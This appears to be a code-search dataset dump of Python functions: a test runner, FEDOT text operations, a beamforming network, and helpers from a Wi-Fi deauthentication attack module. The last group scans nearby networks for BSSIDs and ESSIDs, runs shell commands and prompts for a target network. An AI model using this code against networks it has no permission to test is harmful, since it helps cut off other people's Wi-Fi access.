body_hash
stringlengths
64
64
body
stringlengths
23
109k
docstring
stringlengths
1
57k
path
stringlengths
4
198
name
stringlengths
1
115
repository_name
stringlengths
7
111
repository_stars
float64
0
191k
lang
stringclasses
1 value
body_without_docstring
stringlengths
14
108k
unified
stringlengths
45
133k
bfbd3120c3a4e479d95a487c53d97fb5d52adf22e5eb2d5efc998c6c35ea9111
def updated(self, text=None): 'Attests that a test case has been updated.' if text: self.ui.notice(text) self.update_num += 1
Attests that a test case has been updated.
src/pbbt/ctl.py
updated
prometheusresearch/pbbt
2
python
def updated(self, text=None): if text: self.ui.notice(text) self.update_num += 1
def updated(self, text=None): if text: self.ui.notice(text) self.update_num += 1<|docstring|>Attests that a test case has been updated.<|endoftext|>
df739f134410a215f10afb592fcb976b248e34372ddb77854fb0c6ff239be327
def halt(self, text=None): 'Halts the testing process.' if text: self.ui.error(text) self.halted = True
Halts the testing process.
src/pbbt/ctl.py
halt
prometheusresearch/pbbt
2
python
def halt(self, text=None): if text: self.ui.error(text) self.halted = True
def halt(self, text=None): if text: self.ui.error(text) self.halted = True<|docstring|>Halts the testing process.<|endoftext|>
48c48235288fed02673c43ca42681dc5e08a9ef97f6db7db1a8998a118a8c214
def load_input(self, path): 'Loads input test data from the given file.' return load(path, registry.input_types, self.state)
Loads input test data from the given file.
src/pbbt/ctl.py
load_input
prometheusresearch/pbbt
2
python
def load_input(self, path): return load(path, registry.input_types, self.state)
def load_input(self, path): return load(path, registry.input_types, self.state)<|docstring|>Loads input test data from the given file.<|endoftext|>
4bfe36f4f8daf6840f4cd8be13a85004abdaa51f0edf94610a31a20824200126
def load_output(self, path): 'Loads output test data from the given file.' return load(path, registry.output_types)
Loads output test data from the given file.
src/pbbt/ctl.py
load_output
prometheusresearch/pbbt
2
python
def load_output(self, path): return load(path, registry.output_types)
def load_output(self, path): return load(path, registry.output_types)<|docstring|>Loads output test data from the given file.<|endoftext|>
a06e99a6083369f925185c18c92c6c77654bfb6f26c916776f3243665c07ec84
def dump_output(self, path, data): 'Saves output test data to the given file.' return dump(path, data)
Saves output test data to the given file.
src/pbbt/ctl.py
dump_output
prometheusresearch/pbbt
2
python
def dump_output(self, path, data): return dump(path, data)
def dump_output(self, path, data): return dump(path, data)<|docstring|>Saves output test data to the given file.<|endoftext|>
3ad910c43c193fd731dc22e7409ee99d2e71ffb150426c4395d4de0305d35855
def run(self, case): 'Executes a test case.' return case()
Executes a test case.
src/pbbt/ctl.py
run
prometheusresearch/pbbt
2
python
def run(self, case): return case()
def run(self, case): return case()<|docstring|>Executes a test case.<|endoftext|>
d7d134e3b7d0898ebd0255683636bfc23a9457a8b4e0ae43d6d23ae10c3abf1b
def __call__(self, input_path, output_path): 'Runs the testing process with the given input and output.' input = self.load_input(input_path) output = None if ((output_path is not None) and os.path.exists(output_path)): output = self.load_output(output_path) if (not input.__complements__(output)): output = None case = input.__owner__(self, input, output) new_output = self.run(case) line = [] if self.success_num: line.append(('%s passed' % self.success_num)) if self.update_num: line.append(('%s updated' % self.update_num)) if self.failure_num: line.append(('%s FAILED!' % self.failure_num)) line = ', '.join(line) self.ui.part() if line: line = ('TESTS: %s' % line) if self.failure_num: self.ui.error(line) else: self.ui.notice(line) if ((output_path is not None) and (new_output is not None) and (new_output != output)): reply = self.ui.choice(None, ('', 'save changes'), ('d', 'discard changes')) if (reply == ''): self.ui.notice(('saving test output to %r' % output_path)) self.dump_output(output_path, new_output) return int(bool(self.failure_num))
Runs the testing process with the given input and output.
src/pbbt/ctl.py
__call__
prometheusresearch/pbbt
2
python
def __call__(self, input_path, output_path): input = self.load_input(input_path) output = None if ((output_path is not None) and os.path.exists(output_path)): output = self.load_output(output_path) if (not input.__complements__(output)): output = None case = input.__owner__(self, input, output) new_output = self.run(case) line = [] if self.success_num: line.append(('%s passed' % self.success_num)) if self.update_num: line.append(('%s updated' % self.update_num)) if self.failure_num: line.append(('%s FAILED!' % self.failure_num)) line = ', '.join(line) self.ui.part() if line: line = ('TESTS: %s' % line) if self.failure_num: self.ui.error(line) else: self.ui.notice(line) if ((output_path is not None) and (new_output is not None) and (new_output != output)): reply = self.ui.choice(None, (, 'save changes'), ('d', 'discard changes')) if (reply == ): self.ui.notice(('saving test output to %r' % output_path)) self.dump_output(output_path, new_output) return int(bool(self.failure_num))
def __call__(self, input_path, output_path): input = self.load_input(input_path) output = None if ((output_path is not None) and os.path.exists(output_path)): output = self.load_output(output_path) if (not input.__complements__(output)): output = None case = input.__owner__(self, input, output) new_output = self.run(case) line = [] if self.success_num: line.append(('%s passed' % self.success_num)) if self.update_num: line.append(('%s updated' % self.update_num)) if self.failure_num: line.append(('%s FAILED!' % self.failure_num)) line = ', '.join(line) self.ui.part() if line: line = ('TESTS: %s' % line) if self.failure_num: self.ui.error(line) else: self.ui.notice(line) if ((output_path is not None) and (new_output is not None) and (new_output != output)): reply = self.ui.choice(None, (, 'save changes'), ('d', 'discard changes')) if (reply == ): self.ui.notice(('saving test output to %r' % output_path)) self.dump_output(output_path, new_output) return int(bool(self.failure_num))<|docstring|>Runs the testing process with the given input and output.<|endoftext|>
216e325d7ff5e167bab738d5b83f83ca8f82eb70858f60bfb71b407eb744dc85
@staticmethod def _convert_to_one_dim(array_with_text): ' Method converts array with text into one-dimensional list\n\n :param array_with_text: numpy array or list with text data\n :return features_list: one-dimensional list with text\n ' features = np.ravel(np.array(array_with_text, dtype=str)) features_list = list(features) return features_list
Method converts array with text into one-dimensional list :param array_with_text: numpy array or list with text data :return features_list: one-dimensional list with text
fedot/core/operations/evaluation/text.py
_convert_to_one_dim
rozlana-g/FEDOT
358
python
@staticmethod def _convert_to_one_dim(array_with_text): ' Method converts array with text into one-dimensional list\n\n :param array_with_text: numpy array or list with text data\n :return features_list: one-dimensional list with text\n ' features = np.ravel(np.array(array_with_text, dtype=str)) features_list = list(features) return features_list
@staticmethod def _convert_to_one_dim(array_with_text): ' Method converts array with text into one-dimensional list\n\n :param array_with_text: numpy array or list with text data\n :return features_list: one-dimensional list with text\n ' features = np.ravel(np.array(array_with_text, dtype=str)) features_list = list(features) return features_list<|docstring|>Method converts array with text into one-dimensional list :param array_with_text: numpy array or list with text data :return features_list: one-dimensional list with text<|endoftext|>
49e57f27a700873c70034b70da8aaffe11a577a9f74b02ac652852472b90060c
def fit(self, train_data: InputData): '\n This method is used for operation training with the data provided\n\n :param InputData train_data: data used for operation training\n :return: trained model\n ' if self.params: text_processor = self.text_processor(**self.params_for_fit) else: text_processor = self.text_processor() text_processor.fit(train_data) return text_processor
This method is used for operation training with the data provided :param InputData train_data: data used for operation training :return: trained model
fedot/core/operations/evaluation/text.py
fit
rozlana-g/FEDOT
358
python
def fit(self, train_data: InputData): '\n This method is used for operation training with the data provided\n\n :param InputData train_data: data used for operation training\n :return: trained model\n ' if self.params: text_processor = self.text_processor(**self.params_for_fit) else: text_processor = self.text_processor() text_processor.fit(train_data) return text_processor
def fit(self, train_data: InputData): '\n This method is used for operation training with the data provided\n\n :param InputData train_data: data used for operation training\n :return: trained model\n ' if self.params: text_processor = self.text_processor(**self.params_for_fit) else: text_processor = self.text_processor() text_processor.fit(train_data) return text_processor<|docstring|>This method is used for operation training with the data provided :param InputData train_data: data used for operation training :return: trained model<|endoftext|>
23c89a3b53f84f625a7c22a036e8e4dbf3ac0580be8ac7728b1ea1b42d2c47a1
def predict(self, trained_operation, predict_data: InputData, is_fit_pipeline_stage: bool) -> OutputData: '\n This method used for prediction of the target data.\n\n :param trained_operation: trained operation object\n :param predict_data: data to predict\n :param is_fit_pipeline_stage: is this fit or predict stage for pipeline\n :return OutputData: passed data with new predicted target\n ' prediction = trained_operation.transform(predict_data, is_fit_pipeline_stage) converted = self._convert_to_output(prediction, predict_data) return converted
This method used for prediction of the target data. :param trained_operation: trained operation object :param predict_data: data to predict :param is_fit_pipeline_stage: is this fit or predict stage for pipeline :return OutputData: passed data with new predicted target
fedot/core/operations/evaluation/text.py
predict
rozlana-g/FEDOT
358
python
def predict(self, trained_operation, predict_data: InputData, is_fit_pipeline_stage: bool) -> OutputData: '\n This method used for prediction of the target data.\n\n :param trained_operation: trained operation object\n :param predict_data: data to predict\n :param is_fit_pipeline_stage: is this fit or predict stage for pipeline\n :return OutputData: passed data with new predicted target\n ' prediction = trained_operation.transform(predict_data, is_fit_pipeline_stage) converted = self._convert_to_output(prediction, predict_data) return converted
def predict(self, trained_operation, predict_data: InputData, is_fit_pipeline_stage: bool) -> OutputData: '\n This method used for prediction of the target data.\n\n :param trained_operation: trained operation object\n :param predict_data: data to predict\n :param is_fit_pipeline_stage: is this fit or predict stage for pipeline\n :return OutputData: passed data with new predicted target\n ' prediction = trained_operation.transform(predict_data, is_fit_pipeline_stage) converted = self._convert_to_output(prediction, predict_data) return converted<|docstring|>This method used for prediction of the target data. :param trained_operation: trained operation object :param predict_data: data to predict :param is_fit_pipeline_stage: is this fit or predict stage for pipeline :return OutputData: passed data with new predicted target<|endoftext|>
fc3e0b094c9fe5c66adc9d9e58679aea97dbf0ee2b180c97276cf22e1b9ed0c7
def forward(self, inpt): '\n inpt: (B,T,F,M,2)\n ' inv_Phi_yy = self.inv_module(inpt) (b_size, seq_len, freq_num, M, _) = inpt.shape inpt1 = inpt.view(b_size, seq_len, freq_num, (- 1)).permute(0, 3, 1, 2).contiguous() (en_x, en_list) = self.en(inpt1) en_x = en_x.transpose((- 2), (- 1)).contiguous().view(b_size, (- 1), seq_len) acc_x = Variable(torch.zeros_like(en_x), requires_grad=True).to(en_x.device) x = en_x for i in range(len(self.tcns)): x = self.tcns[i](x) acc_x = (acc_x + x) x = acc_x x = x.view(b_size, 64, 4, seq_len).transpose((- 2), (- 1)).contiguous() Vec_Ys = self.de(inpt, x, en_list) inpt_complex = ComplexTensor(inpt[(..., 0)], inpt[(..., (- 1))]) inv_Phi_yy_complex = ComplexTensor(inv_Phi_yy[(..., 0)], inv_Phi_yy[(..., (- 1))]) Vec_Ys_complex = ComplexTensor(Vec_Ys[(..., 0)], Vec_Ys[(..., (- 1))]) mcwf_bf_complex = F.einsum('...mn,...p->...m', [inv_Phi_yy_complex, Vec_Ys_complex]) bf_x_complex = F.einsum('...m,...n->...', [mcwf_bf_complex.conj(), inpt_complex]) bf_x = torch.stack((bf_x_complex.real, bf_x_complex.imag), dim=(- 1)) return bf_x
inpt: (B,T,F,M,2)
nets/GeneralizedWF.py
forward
Andong-Li-speech/TaylorBeamformer
4
python
def forward(self, inpt): '\n \n ' inv_Phi_yy = self.inv_module(inpt) (b_size, seq_len, freq_num, M, _) = inpt.shape inpt1 = inpt.view(b_size, seq_len, freq_num, (- 1)).permute(0, 3, 1, 2).contiguous() (en_x, en_list) = self.en(inpt1) en_x = en_x.transpose((- 2), (- 1)).contiguous().view(b_size, (- 1), seq_len) acc_x = Variable(torch.zeros_like(en_x), requires_grad=True).to(en_x.device) x = en_x for i in range(len(self.tcns)): x = self.tcns[i](x) acc_x = (acc_x + x) x = acc_x x = x.view(b_size, 64, 4, seq_len).transpose((- 2), (- 1)).contiguous() Vec_Ys = self.de(inpt, x, en_list) inpt_complex = ComplexTensor(inpt[(..., 0)], inpt[(..., (- 1))]) inv_Phi_yy_complex = ComplexTensor(inv_Phi_yy[(..., 0)], inv_Phi_yy[(..., (- 1))]) Vec_Ys_complex = ComplexTensor(Vec_Ys[(..., 0)], Vec_Ys[(..., (- 1))]) mcwf_bf_complex = F.einsum('...mn,...p->...m', [inv_Phi_yy_complex, Vec_Ys_complex]) bf_x_complex = F.einsum('...m,...n->...', [mcwf_bf_complex.conj(), inpt_complex]) bf_x = torch.stack((bf_x_complex.real, bf_x_complex.imag), dim=(- 1)) return bf_x
def forward(self, inpt): '\n \n ' inv_Phi_yy = self.inv_module(inpt) (b_size, seq_len, freq_num, M, _) = inpt.shape inpt1 = inpt.view(b_size, seq_len, freq_num, (- 1)).permute(0, 3, 1, 2).contiguous() (en_x, en_list) = self.en(inpt1) en_x = en_x.transpose((- 2), (- 1)).contiguous().view(b_size, (- 1), seq_len) acc_x = Variable(torch.zeros_like(en_x), requires_grad=True).to(en_x.device) x = en_x for i in range(len(self.tcns)): x = self.tcns[i](x) acc_x = (acc_x + x) x = acc_x x = x.view(b_size, 64, 4, seq_len).transpose((- 2), (- 1)).contiguous() Vec_Ys = self.de(inpt, x, en_list) inpt_complex = ComplexTensor(inpt[(..., 0)], inpt[(..., (- 1))]) inv_Phi_yy_complex = ComplexTensor(inv_Phi_yy[(..., 0)], inv_Phi_yy[(..., (- 1))]) Vec_Ys_complex = ComplexTensor(Vec_Ys[(..., 0)], Vec_Ys[(..., (- 1))]) mcwf_bf_complex = F.einsum('...mn,...p->...m', [inv_Phi_yy_complex, Vec_Ys_complex]) bf_x_complex = F.einsum('...m,...n->...', [mcwf_bf_complex.conj(), inpt_complex]) bf_x = torch.stack((bf_x_complex.real, bf_x_complex.imag), dim=(- 1)) return bf_x<|docstring|>inpt: (B,T,F,M,2)<|endoftext|>
54cd2ba92c18bfac9136bc19f6d1c57e22971209d5e97bc1cf1771426f1253b9
def forward(self, inpt): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,M,2)\n ' (b_size, seq_len, freq_num, M, _) = inpt.shape inpt_complex = ComplexTensor(inpt[(..., 0)], inpt[(..., (- 1))]) inpt_cov = F.einsum('...m,...n->...mn', [inpt_complex.conj(), inpt_complex]) inpt_cov = inpt_cov.view(b_size, seq_len, freq_num, (- 1)) inpt_cov = torch.cat((inpt_cov.real, inpt_cov.imag), dim=(- 1)) inpt_cov = self.norm(inpt_cov) inpt_cov = inpt_cov.transpose(1, 2).contiguous().view((b_size * freq_num), seq_len, (- 1)) (h, _) = self.rnn(inpt_cov) inv_cov = self.w_dnn(h) inv_cov = inv_cov.view(b_size, freq_num, seq_len, M, M, 2) return inv_cov.transpose(1, 2).contiguous()
inpt: (B,T,F,M,2) return: (B,T,F,M,M,2)
nets/GeneralizedWF.py
forward
Andong-Li-speech/TaylorBeamformer
4
python
def forward(self, inpt): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,M,2)\n ' (b_size, seq_len, freq_num, M, _) = inpt.shape inpt_complex = ComplexTensor(inpt[(..., 0)], inpt[(..., (- 1))]) inpt_cov = F.einsum('...m,...n->...mn', [inpt_complex.conj(), inpt_complex]) inpt_cov = inpt_cov.view(b_size, seq_len, freq_num, (- 1)) inpt_cov = torch.cat((inpt_cov.real, inpt_cov.imag), dim=(- 1)) inpt_cov = self.norm(inpt_cov) inpt_cov = inpt_cov.transpose(1, 2).contiguous().view((b_size * freq_num), seq_len, (- 1)) (h, _) = self.rnn(inpt_cov) inv_cov = self.w_dnn(h) inv_cov = inv_cov.view(b_size, freq_num, seq_len, M, M, 2) return inv_cov.transpose(1, 2).contiguous()
def forward(self, inpt): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,M,2)\n ' (b_size, seq_len, freq_num, M, _) = inpt.shape inpt_complex = ComplexTensor(inpt[(..., 0)], inpt[(..., (- 1))]) inpt_cov = F.einsum('...m,...n->...mn', [inpt_complex.conj(), inpt_complex]) inpt_cov = inpt_cov.view(b_size, seq_len, freq_num, (- 1)) inpt_cov = torch.cat((inpt_cov.real, inpt_cov.imag), dim=(- 1)) inpt_cov = self.norm(inpt_cov) inpt_cov = inpt_cov.transpose(1, 2).contiguous().view((b_size * freq_num), seq_len, (- 1)) (h, _) = self.rnn(inpt_cov) inv_cov = self.w_dnn(h) inv_cov = inv_cov.view(b_size, freq_num, seq_len, M, M, 2) return inv_cov.transpose(1, 2).contiguous()<|docstring|>inpt: (B,T,F,M,2) return: (B,T,F,M,M,2)<|endoftext|>
7f0bd87272dd362b1d88edad87f6c9c5c2fe1d5e2e236620d9252dc473cf9576
def forward(self, inpt: Tensor, x: Tensor, en_list: list): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,2)\n ' (b_size, seq_len, freq_num, _, _) = inpt.shape if (self.inter_connect == 'add'): for i in range(len(self.unet_list)): tmp = (x + en_list[(- (i + 1))]) x = self.unet_list[i](tmp) elif (self.inter_connect == 'cat'): for i in range(len(self.unet_list)): tmp = torch.cat((x, en_list[(- (i + 1))]), dim=1) x = self.unet_list[i](tmp) else: raise Exception('only add and cat are supported') if (self.out_type == 'mask'): gain = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) ref_inpt = inpt[(..., 0, :)] Yy = complex_mul(inpt, complex_conj(ref_inpt[(..., None, :)])) out = complex_mul(complex_conj(gain[(..., None, :)]), Yy) elif (self.out_type == 'mapping'): map = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) out = complex_mul(inpt, complex_conj(map[(..., None, :)])) else: raise Exception('only mask and mapping are supported') return out
inpt: (B,T,F,M,2) return: (B,T,F,M,2)
nets/GeneralizedWF.py
forward
Andong-Li-speech/TaylorBeamformer
4
python
def forward(self, inpt: Tensor, x: Tensor, en_list: list): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,2)\n ' (b_size, seq_len, freq_num, _, _) = inpt.shape if (self.inter_connect == 'add'): for i in range(len(self.unet_list)): tmp = (x + en_list[(- (i + 1))]) x = self.unet_list[i](tmp) elif (self.inter_connect == 'cat'): for i in range(len(self.unet_list)): tmp = torch.cat((x, en_list[(- (i + 1))]), dim=1) x = self.unet_list[i](tmp) else: raise Exception('only add and cat are supported') if (self.out_type == 'mask'): gain = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) ref_inpt = inpt[(..., 0, :)] Yy = complex_mul(inpt, complex_conj(ref_inpt[(..., None, :)])) out = complex_mul(complex_conj(gain[(..., None, :)]), Yy) elif (self.out_type == 'mapping'): map = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) out = complex_mul(inpt, complex_conj(map[(..., None, :)])) else: raise Exception('only mask and mapping are supported') return out
def forward(self, inpt: Tensor, x: Tensor, en_list: list): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,2)\n ' (b_size, seq_len, freq_num, _, _) = inpt.shape if (self.inter_connect == 'add'): for i in range(len(self.unet_list)): tmp = (x + en_list[(- (i + 1))]) x = self.unet_list[i](tmp) elif (self.inter_connect == 'cat'): for i in range(len(self.unet_list)): tmp = torch.cat((x, en_list[(- (i + 1))]), dim=1) x = self.unet_list[i](tmp) else: raise Exception('only add and cat are supported') if (self.out_type == 'mask'): gain = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) ref_inpt = inpt[(..., 0, :)] Yy = complex_mul(inpt, complex_conj(ref_inpt[(..., None, :)])) out = complex_mul(complex_conj(gain[(..., None, :)]), Yy) elif (self.out_type == 'mapping'): map = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) out = complex_mul(inpt, complex_conj(map[(..., None, :)])) else: raise Exception('only mask and mapping are supported') return out<|docstring|>inpt: (B,T,F,M,2) return: (B,T,F,M,2)<|endoftext|>
edfbd0578e5421536e8473ce348bd78b5dd78a2268d3e8c86a8974b122718fa6
def forward(self, inpt: Tensor, x: Tensor, en_list: list): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,2)\n ' (b_size, seq_len, freq_num, M, _) = inpt.shape if (self.inter_connect == 'add'): for i in range(len(self.meta_unet_list)): tmp = (x + en_list[(- (i + 1))]) x = self.meta_unet_list[i](tmp) elif (self.inter_connect == 'cat'): for i in range(len(self.meta_unet_list)): tmp = torch.cat((x, en_list[(- (i + 1))]), dim=1) x = self.meta_unet_list[i](tmp) else: raise Exception('only add and cat are supported') if (self.out_type == 'mask'): gain = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) ref_inpt = inpt[(..., 0, :)] Yy = complex_mul(inpt, complex_conj(ref_inpt[(..., None, :)])) out = complex_mul(complex_conj(gain[(..., None, :)]), Yy) elif (self.out_type == 'mapping'): map = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) out = complex_mul(inpt, complex_conj(map[(..., None, :)])) else: raise Exception('only mask and mapping are supported') return out
inpt: (B,T,F,M,2) return: (B,T,F,M,2)
nets/GeneralizedWF.py
forward
Andong-Li-speech/TaylorBeamformer
4
python
def forward(self, inpt: Tensor, x: Tensor, en_list: list): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,2)\n ' (b_size, seq_len, freq_num, M, _) = inpt.shape if (self.inter_connect == 'add'): for i in range(len(self.meta_unet_list)): tmp = (x + en_list[(- (i + 1))]) x = self.meta_unet_list[i](tmp) elif (self.inter_connect == 'cat'): for i in range(len(self.meta_unet_list)): tmp = torch.cat((x, en_list[(- (i + 1))]), dim=1) x = self.meta_unet_list[i](tmp) else: raise Exception('only add and cat are supported') if (self.out_type == 'mask'): gain = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) ref_inpt = inpt[(..., 0, :)] Yy = complex_mul(inpt, complex_conj(ref_inpt[(..., None, :)])) out = complex_mul(complex_conj(gain[(..., None, :)]), Yy) elif (self.out_type == 'mapping'): map = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) out = complex_mul(inpt, complex_conj(map[(..., None, :)])) else: raise Exception('only mask and mapping are supported') return out
def forward(self, inpt: Tensor, x: Tensor, en_list: list): '\n inpt: (B,T,F,M,2)\n return: (B,T,F,M,2)\n ' (b_size, seq_len, freq_num, M, _) = inpt.shape if (self.inter_connect == 'add'): for i in range(len(self.meta_unet_list)): tmp = (x + en_list[(- (i + 1))]) x = self.meta_unet_list[i](tmp) elif (self.inter_connect == 'cat'): for i in range(len(self.meta_unet_list)): tmp = torch.cat((x, en_list[(- (i + 1))]), dim=1) x = self.meta_unet_list[i](tmp) else: raise Exception('only add and cat are supported') if (self.out_type == 'mask'): gain = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) ref_inpt = inpt[(..., 0, :)] Yy = complex_mul(inpt, complex_conj(ref_inpt[(..., None, :)])) out = complex_mul(complex_conj(gain[(..., None, :)]), Yy) elif (self.out_type == 'mapping'): map = torch.stack((self.out_r(x).squeeze(dim=1), self.out_i(x).squeeze(dim=1)), dim=(- 1)) out = complex_mul(inpt, complex_conj(map[(..., None, :)])) else: raise Exception('only mask and mapping are supported') return out<|docstring|>inpt: (B,T,F,M,2) return: (B,T,F,M,2)<|endoftext|>
0f38d2294ac4c26a5049258b371f3aadedd9a1140633ee32f65036031aa4ae69
@staticmethod def is_root(): '\n Checks if program is running as root or not\n ' if (os.geteuid() != 0): colors.error('Please run as root') sys.exit(1) else: colors.success('Running as root')
Checks if program is running as root or not
src/lib/attacks/deauth/deauth_attack.py
is_root
FrancescoPenasa/vault_scanner
230
python
@staticmethod def is_root(): '\n \n ' if (os.geteuid() != 0): colors.error('Please run as root') sys.exit(1) else: colors.success('Running as root')
@staticmethod def is_root(): '\n \n ' if (os.geteuid() != 0): colors.error('Please run as root') sys.exit(1) else: colors.success('Running as root')<|docstring|>Checks if program is running as root or not<|endoftext|>
0eb55037a4afba4cf7b3e6a3dab0a52586b2486797dd6779e6b8da5211ba9585
@staticmethod def getInterface(): '\n Collects all the interfaces\n ' colors.info('Collecting all the interfaces') p = subprocess.Popen(['ifconfig'], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = p.communicate() if error: print(error.decode('utf-8')) sys.exit(1) output = output.decode('utf-8') interfaces = re.findall('(.*): ', output) total_index = 0 print(('*' * 25)) print('Index'.ljust(8, ' '), '|', ' Interface '.ljust(12, ' '), '|') print(('*' * 25)) for (index, interface) in enumerate(interfaces): print(index, ' '.ljust(5), ' | ', interface.ljust(11, ' '), '|') total_index = (total_index + 1) print(('-' * 25)) intf = (- 1) while ((intf > total_index) or (intf < 0)): intf = int(input('\n>> Enter the index of the interface : ').strip()) colors.info('Selected interface is : {}'.format(interfaces[intf])) return interfaces[intf]
Collects all the interfaces
src/lib/attacks/deauth/deauth_attack.py
getInterface
FrancescoPenasa/vault_scanner
230
python
@staticmethod def getInterface(): '\n \n ' colors.info('Collecting all the interfaces') p = subprocess.Popen(['ifconfig'], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = p.communicate() if error: print(error.decode('utf-8')) sys.exit(1) output = output.decode('utf-8') interfaces = re.findall('(.*): ', output) total_index = 0 print(('*' * 25)) print('Index'.ljust(8, ' '), '|', ' Interface '.ljust(12, ' '), '|') print(('*' * 25)) for (index, interface) in enumerate(interfaces): print(index, ' '.ljust(5), ' | ', interface.ljust(11, ' '), '|') total_index = (total_index + 1) print(('-' * 25)) intf = (- 1) while ((intf > total_index) or (intf < 0)): intf = int(input('\n>> Enter the index of the interface : ').strip()) colors.info('Selected interface is : {}'.format(interfaces[intf])) return interfaces[intf]
@staticmethod def getInterface(): '\n \n ' colors.info('Collecting all the interfaces') p = subprocess.Popen(['ifconfig'], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = p.communicate() if error: print(error.decode('utf-8')) sys.exit(1) output = output.decode('utf-8') interfaces = re.findall('(.*): ', output) total_index = 0 print(('*' * 25)) print('Index'.ljust(8, ' '), '|', ' Interface '.ljust(12, ' '), '|') print(('*' * 25)) for (index, interface) in enumerate(interfaces): print(index, ' '.ljust(5), ' | ', interface.ljust(11, ' '), '|') total_index = (total_index + 1) print(('-' * 25)) intf = (- 1) while ((intf > total_index) or (intf < 0)): intf = int(input('\n>> Enter the index of the interface : ').strip()) colors.info('Selected interface is : {}'.format(interfaces[intf])) return interfaces[intf]<|docstring|>Collects all the interfaces<|endoftext|>
e90692bcf600df1729032762587e1edff98a2c02a7ab3aa266ead381d7b3c7ca
@staticmethod def monitorWifi(intf): '\n Monitor all the nearby WiFi devices\n and collect their BSSID, ESSID\n ' t1 = time.time() BSSID = [] ESSID = [] command = "iwlist {} scanning | egrep 'Cell | ESSID'".format(intf) for current_scan in range(5): print('Started scan : {}, Total : 5'.format(current_scan), end='\r') output = subprocess.check_output(command, shell=True) output = output.decode('utf-8') found_bssid = re.findall('Address:(.*)', output) found_essid = re.findall('ESSID:(.*)', output) for bssid in found_bssid: if (bssid not in BSSID): BSSID.append(bssid) for essid in found_essid: if (essid not in ESSID): ESSID.append(essid) if (len(BSSID) == len(ESSID)): t2 = time.time() print('Scanning completed in : {}\n'.format((t2 - t1))) return (BSSID, ESSID) else: colors.error('Something went wrong, try again...') sys.exit(1)
Monitor all the nearby WiFi devices and collect their BSSID, ESSID
src/lib/attacks/deauth/deauth_attack.py
monitorWifi
FrancescoPenasa/vault_scanner
230
python
@staticmethod def monitorWifi(intf): '\n Monitor all the nearby WiFi devices\n and collect their BSSID, ESSID\n ' t1 = time.time() BSSID = [] ESSID = [] command = "iwlist {} scanning | egrep 'Cell | ESSID'".format(intf) for current_scan in range(5): print('Started scan : {}, Total : 5'.format(current_scan), end='\r') output = subprocess.check_output(command, shell=True) output = output.decode('utf-8') found_bssid = re.findall('Address:(.*)', output) found_essid = re.findall('ESSID:(.*)', output) for bssid in found_bssid: if (bssid not in BSSID): BSSID.append(bssid) for essid in found_essid: if (essid not in ESSID): ESSID.append(essid) if (len(BSSID) == len(ESSID)): t2 = time.time() print('Scanning completed in : {}\n'.format((t2 - t1))) return (BSSID, ESSID) else: colors.error('Something went wrong, try again...') sys.exit(1)
@staticmethod def monitorWifi(intf): '\n Monitor all the nearby WiFi devices\n and collect their BSSID, ESSID\n ' t1 = time.time() BSSID = [] ESSID = [] command = "iwlist {} scanning | egrep 'Cell | ESSID'".format(intf) for current_scan in range(5): print('Started scan : {}, Total : 5'.format(current_scan), end='\r') output = subprocess.check_output(command, shell=True) output = output.decode('utf-8') found_bssid = re.findall('Address:(.*)', output) found_essid = re.findall('ESSID:(.*)', output) for bssid in found_bssid: if (bssid not in BSSID): BSSID.append(bssid) for essid in found_essid: if (essid not in ESSID): ESSID.append(essid) if (len(BSSID) == len(ESSID)): t2 = time.time() print('Scanning completed in : {}\n'.format((t2 - t1))) return (BSSID, ESSID) else: colors.error('Something went wrong, try again...') sys.exit(1)<|docstring|>Monitor all the nearby WiFi devices and collect their BSSID, ESSID<|endoftext|>
66f2feb45d1a708621ccb14701a1cf5b5e6db7fbcf62ebe217615d75c4fe6519
@staticmethod def quickExecute(command): '\n Quickly execute small commands\n ' subprocess.check_output(command, shell=True)
Quickly execute small commands
src/lib/attacks/deauth/deauth_attack.py
quickExecute
FrancescoPenasa/vault_scanner
230
python
@staticmethod def quickExecute(command): '\n \n ' subprocess.check_output(command, shell=True)
@staticmethod def quickExecute(command): '\n \n ' subprocess.check_output(command, shell=True)<|docstring|>Quickly execute small commands<|endoftext|>
2fd0b836b0b6e77b2fc1831cbc1178f69c356a75157a6fe6ff88353145d6dd21
def parseResult(self): '\n Parses and beautifully print\n the monitored result\n ' print(('*' * 61)) print('Index'.ljust(4), '|', ' ESSID '.ljust(30), '|', ' BSSID '.ljust(18), '|') print(('*' * 61)) for index in range(len(self.BSSID)): print(str(index).ljust(5), '|', self.ESSID[index].ljust(30), '|', self.BSSID[index].ljust(17), '|') print(('-' * 61)) print('\n') choice_target = (- 1) while ((choice_target > len(self.BSSID)) or (choice_target < 0)): choice_target = int(input('>> Enter the index of the target : ')) return (self.BSSID[choice_target], self.ESSID[choice_target])
Parses and beautifully print the monitored result
src/lib/attacks/deauth/deauth_attack.py
parseResult
FrancescoPenasa/vault_scanner
230
python
